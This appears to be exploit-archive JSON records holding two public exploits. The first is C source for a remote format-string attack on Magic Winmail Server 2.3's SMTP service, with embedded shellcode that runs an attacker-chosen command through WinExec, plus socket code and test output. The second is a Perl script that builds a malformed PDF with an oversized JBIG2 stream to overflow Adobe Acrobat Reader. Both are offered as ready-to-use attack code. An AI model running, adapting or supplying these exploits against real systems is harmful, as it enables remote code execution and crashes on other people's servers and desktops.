Winmail Mail Server 2.3 Remote Format String Exploit

{"type": "zdt", "lastseen": "2016-04-20T01:30:17", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Winmail Mail Server 2.3 Remote Format String Exploit", "published": "2003-06-11T00:00:00", "href": "http://0day.today/exploit/description/8314", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category remote exploits", "hash": "2c873f305350f8e32bb559158ad72855433e7efe9f3ce5b0e3a1a4ce91bed67d", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "====================================================\r\nWinmail Mail Server 2.3 Remote Format String Exploit\r\n====================================================\r\n\r\n\r\n/******************************************************************\r\n * Magic Winmail Server 2.3(Build 0402) \r\n * Remote Format string exploit.\r\n ******************************************************************\r\n * Coded by ThreaT.\r\n *\r\n *\r\n * This one take advantage of a format bug in the \r\n * >>> SMTP protocol <<< (not pop3) for execute\r\n * a malicious command on a vulnerable system\r\n *\r\n * usage : mwmxploit <Target IP> <command to execute remotely> [smtp port]\r\n * + The command to execute cannot exceed 90 characters +\r\n *\r\n * compile : cl.exe mwmxploit.c /w\r\n *\r\n ******************************************************************\r\n*/\r\n\r\n\r\n#include <windows.h>\r\n#include <winsock.h>\r\n\r\n#pragma comment (lib,\"wsock32.lib\")\r\n\r\nvoid main (int argc, char *argv[])\r\n{\r\n\r\n\tSOCKET sock;\r\n\r\n\tchar buffer[1000];\r\n\tint i;\r\n\r\n\t// ecrasement d'un saved EIP gr?ce aux caract?res de format\r\n\tchar vuln[] = \t\t\r\n\t\t\"\\xec\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xed\\xfc\\x66\\x01%x%x\"\r\n\t\t\"\\xee\\xfc\\x66\\x01\"\r\n\t\t\r\n\t\t\"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%28x%n\"\r\n\t\t\"%97x%n%105x%hn\"\r\n\r\n/*\r\n\r\n This is my specific shellcode for execute a command\r\n over the Magic Winmail process.\r\n\r\n This one can contain null bytes, enjoy ! :)\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\nDisassembly of File: mailserver.exe\r\nCode Offset = 00001000, Code Size = 000CF000\r\nData Offset = 000EC000, Data Size = 0002E000\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n Reference To: KERNEL32.GetModuleHandleA, Ord:0000h\r\n:004B8850 FF15AC014D00 Call dword ptr [004D01AC]\r\n\r\n Reference To: KERNEL32.ExitProcess, Ord:0000h\r\n:004B88C6 FF1598014D00 Call dword ptr [004D0198]\r\n\r\n Reference To: KERNEL32.GetProcAddress, Ord:0000h\r\n:00406CE7 8B3DEC004D00 mov edi, dword ptr [004D00EC]\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\n //////////////////////// My shellcode \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\n\r\n: EB50 jmp 00401058\r\n: 5E pop esi\r\n: 8BEC mov ebp, esp\r\n: 83EC28 sub esp, 00000028\t\t// je cree un stack\r\n: C745D84B65726E mov [ebp-28], 6E72654B\r\n: C745DC656C3332 mov [ebp-24], 32336C65 // j'y place 'Kernel32'\r\n: C745E000000000 mov [ebp-20], 00000000\r\n: C745E457696E45 mov [ebp-1C], 456E6957\r\n: C745E878656300 mov [ebp-18], 00636578 // ici 'WinExec'\r\n\r\n// adaptez le shellcode en virant cette ligne si vraiment vous avez besoin \r\n// de 4 caract?res de plus pour la commande ? executer\r\n: C645EB00 mov [ebp-15], 00\r\n\t\t\t\t\t\t\t\t\t\t\r\n: BAAC014D00 mov edx, 004D01AC\r\n: 8D45D8 lea eax, dword ptr [ebp-28]\r\n: 50 push eax\r\n: FF12 call dword ptr [edx]\t// eax = GetModuleHandle (\"Kernel32\");\r\n: 8D5DE4 lea ebx, dword ptr [ebp-1C]\r\n: 53 push ebx\r\n: 50 push eax\r\n: BAEC004D00 mov edx, 004D00EC\r\n: FF12 call dword ptr [edx]\t// GetProcAdress (eax, \"WinExec\");\r\n: 6A01 push 00000001\t\t// 1 = SW_SHOW, 0 = SW_HIDE \r\n: 56 push esi\r\n: FFD0 call eax\t\t\t// WinExec (argv[2], SW_SHOW)\r\n: BA98014D00 mov edx, 004D0198\r\n: FF12 call dword ptr [edx]\t// ExitProcess ();\r\n: E8ABFFFFFF call 00401008\t\r\n\r\n \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ EOF /////////////////////////////////\r\n\r\n */\r\n\t\r\n\r\n// Generated by Hex Workshop\r\n// shellcode.exe - Starting Offset: 4102 (0x00001006) Length: 87 (0x00000057)\r\n\r\n\t\"\\x00\\x90\\x90\\x90\\x90\"\t// sa, c'est pour bien coller\r\n\t\"\\xEB\\x50\\x5E\\x8B\\xEC\\x83\\xEC\\x28\\xC7\\x45\\xD8\\x4B\\x65\\x72\\x6E\\xC7\" \r\n\t\"\\x45\\xDC\\x65\\x6C\\x33\\x32\\xC7\\x45\\xE0\\x00\\x00\\x00\\x00\\xC7\\x45\\xE4\" \r\n\t\"\\x57\\x69\\x6E\\x45\\xC7\\x45\\xE8\\x78\\x65\\x63\\x00\\xC6\\x45\\xEB\\x00\\xBA\" \r\n\t\"\\xAC\\x01\\x4D\\x00\\x8D\\x45\\xD8\\x50\\xFF\\x12\\x8D\\x5D\\xE4\\x53\\x50\\xBA\" \r\n\t\"\\xEC\\x00\\x4D\\x00\\xFF\\x12\\x6A\\x01\\x56\\xFF\\xD0\\xBA\\x98\\x01\\x4D\\x00\" \r\n\t\"\\xFF\\x12\\xE8\\xAB\\xFF\\xFF\\xFF\";\r\n\r\n\tSOCKADDR_IN sin;\r\n\tWSADATA wsadata;\r\n\tWORD wVersionRequested = MAKEWORD (2,0);\r\n\r\n\t//\r\n\tprintf (\"* #################################### *\\n\"\r\n\t\t\" Magic Winmail Server 2.3(Build 0402)\\n\"\r\n\t\t\" Remote format string exploit !\\n\"\r\n\t\t\"* #################################### *\\n\"\r\n\t\t\" Coded By ThreaT -> ThreaT\\n\\n\");\r\n\r\n\tif (argc < 3 || strlen (argv[2]) > 90)\r\n\t{\r\n\tprintf (\"usage : mwmxploit <Target IP> <command to execute> [smtp port]\\n\\n\"\r\n\t\t\t\" + The command to execute cannot exceed 90 characters +\\n\");\r\n\tExitProcess (0);\r\n\t}\r\n\r\n\tif ( WSAStartup(wVersionRequested, &wsadata) )\r\n\t{\r\n\t\tprintf (\"Erreur d'initialisation winsock !\\n\");\r\n\t\tExitProcess (1);\t\t\r\n\t}\r\n\r\n\tsin.sin_family = AF_INET;\r\n\tsin.sin_port = htons ((void *)argv[3] ? atoi (argv[3]) : 25);\r\n\t\r\n\tif ( (sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)\r\n\t{\r\n\t\tprintf (\"Erreur : L'adresse IP de la victime est incorrect !\\n\");\r\n\t\tExitProcess (2);\r\n\t}\r\n\r\n\tprintf (\"connecting to %s on port %u...\", argv[1], ntohs ( sin.sin_port ) );\r\n\r\n\tsock = socket (AF_INET, SOCK_STREAM, 0);\r\n\tif ( connect (sock, (SOCKADDR *)&sin, sizeof (sin)) )\r\n\t{\r\n\t\tprintf (\"erreur : connexion impossible !\\n\");\r\n\t\tExitProcess (3);\r\n\t}\r\n\r\n\trecv (sock,buffer,1000,0);\r\n\t\r\n\tprintf (\"ok\\n-> %s\\nsending exploit code...\",buffer);\r\n\r\n\tsend (sock, vuln, strlen (vuln) + 92, 0); // envoi du shellcode\r\n\tsend (sock, argv[2], strlen (argv[2]), 0); // envoi de la commande\r\n\tsend (sock, \"\\r\\n\", 2, 0); // validation\r\n\r\n\trecv (sock,buffer,1000,0); // remote crash :)\r\n\r\n\tputs (\"ok\");\r\n}\r\n\r\n/*\r\nD:\\toolz\\netcat>nc 127.0.0.1 25\r\n220 M1 Magic Winmail Server 2.3(Build 0402) ESMTP ready\r\nAAAA 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.\r\n8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x \r\n0x%.8x 0x%.8x 0x%.8x 0x%.8x 0x%.8x\r\n502 unimplemented (#5.5.1)\r\n */\r\n\r\n/*\r\nD:\\>type \"c:\\Program Files\\Magic Winmail\\server\\logs\\smtp.log\"\r\n0906/Y-01:50:30 1548 Connect from 127.0.0.1\r\n0906/Y-01:51:06 1584 unrecognized command = AAAA 0x00498f71 0x0176fd10 \r\n0x0176fe3c 0x000000eb 0x0176ff80 0x00ee6c80 0x00000050 0x00ee60d9 0x00000102 \r\n0x0000011f 0x00000050 0x00eecf71 0x0000001c 0x0000001f 0x0176ff74 0x004cd2c0 \r\n0x00000001 0x00493e40 0x0176fd50 0x00000000 0x00ee5ea8 0x00ee5ea8 0x41414141 \r\n0x25783020 0x2078382e 0x2e257830 0x30207838 0x382e2578 0x78302078 0x78382e25 \r\n0x25783020 0x2078382e 0x2e257830\r\n\r\n*/\r\n\r\n\r \n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-8314", "sourceHref": "http://0day.today/exploit/8314", "modified": "2003-06-11T00:00:00", "reporter": "ThreaT", "viewCount": 1, "enchantments": {"vulnersScore": 6.6}}

{"result": {"zdt": [{"lastseen": "2016-04-19T03:21:00", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 1, "reporter": "Guido Landi", "published": "2009-02-23T00:00:00", "type": "zdt", "title": "Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day", "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-02-23T00:00:00", "href": "http://0day.today/exploit/description/6759", "id": "1337DAY-ID-6759", "sourceData": "============================================================\r\nAdobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day\r\n============================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n# k`sOSe 02/22/2009\r\n\r\n# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html\r\n\r\nmy $size = \"\\x40\\x00\";\r\nmy $factor = \"ABCD\";\r\nmy $data = \"A\" x 8314;\r\n\r\n\r\nprint pdf();\r\n\r\nsub pdf() \r\n{\r\n\r\n\"%PDF-1.5\\n\" .\r\n\"%\\xec\\xf5\\xf2\\xe1\\xe4\\xef\\xe3\\xf5\\xed\\xe5\\xee\\xf4\\n\" .\r\n\"3 0 \\n\" .\r\n\"xref\\n\" .\r\n\"3 16\\n\" .\r\n\"0000000023 00000 n \\n\" .\r\n\"0000000584 00000 n \\n\" .\r\n\"0000000865 00000 n \\n\" .\r\n\"0000001035 00000 n \\n\" .\r\n\"0000001158 00000 n \\n\" .\r\n\"0000001287 00000 n \\n\" . \r\n\"0000001338 00000 n \\n\" .\r\n\"0000001384 00000 n \\n\" .\r\n\"0000002861 00000 n \\n\" .\r\n\"0000003637 00000 n \\n\" .\r\n\"0000005126 00000 n \\n\" .\r\n\"0000005173 00000 n \\n\" .\r\n\"0000005317 00000 n \\n\" .\r\n\"0000005370 00000 n \\n\" .\r\n\"0000005504 00000 n \\n\" .\r\n\"0000000714 00000 n \\n\" .\r\n\"trailer\\n\" .\r\n\"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\\n\" .\r\n\"startxref\\n\" .\r\n\"0\\n\" .\r\n\"%%EOF\\n\" .\r\n\" \\n\" .\r\n\"4 0 obj\\n\" .\r\n\"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\\n\" .\r\n\"endobj\\n\" .\r\n\" \\n\" .\r\n\"5 0 obj\\n\" .\r\n\"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\\n\" .\r\n\"endobj\\n\" .\r\n\"6 0 obj\\n\" .\r\n\"<</Length 56/Filter/FlateDecode>>\\n\" .\r\n\"stream\\n\" .\r\n\"x\\x9c\\xe3*T031P\\x00A\\x13\\x0b\\x08\\x9d\\x9c\\xab\\xa0\\xef\\x99k``\\xa8\\xe0\\x92\\xaf\\x10\\xc8\\x85[\\x81\\x11!\\x05\\xc6\\x84\\x14\\x98\\xc0\\x14\\xc0\\$\\@\\xb4\\x05\\xb2\\n\" .\r\n\"S\\xb0\\n\" .\r\n\"\\x00J\\x15#,\\n\" .\r\n\"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\r\n\"12 0 obj\\n\" .\r\n\"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\\n\" .\r\n\"stream\\n\" .\r\n\"\\x00\\x00\\x00\\x01\" . $size . $factor . \"\\x13\" . $data . \"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\"13 0 obj\\n\" .\r\n\"<</Type/OCG/Name(Text Color)>>\\n\" .\r\n\"endobj\\n\" .\r\n\"14 0 obj\\n\" .\r\n\"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\\n\" .\r\n\"stream\\n\" .\r\n\"\\x00\\n\" .\r\n\"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\r\n\"1 0 obj\\n\" .\r\n\"<</Type/Pages/Kids[5 0 R]/Count 1>>\\n\" .\r\n\"endobj\\n\" .\r\n\"xref\\n\" . \r\n\"0 3\\n\" . \r\n\"0000000000 65535 f \\n\" .\r\n\"0000009988 00000 n \\n\" .\r\n\"0000010039 00000 n \\n\" .\r\n\"trailer\\n\" .\r\n\"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\\n\" .\r\n\"startxref\\n\" .\r\n\"104\\n\" .\r\n\"%%EOF\\n\";\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/6759"}]}}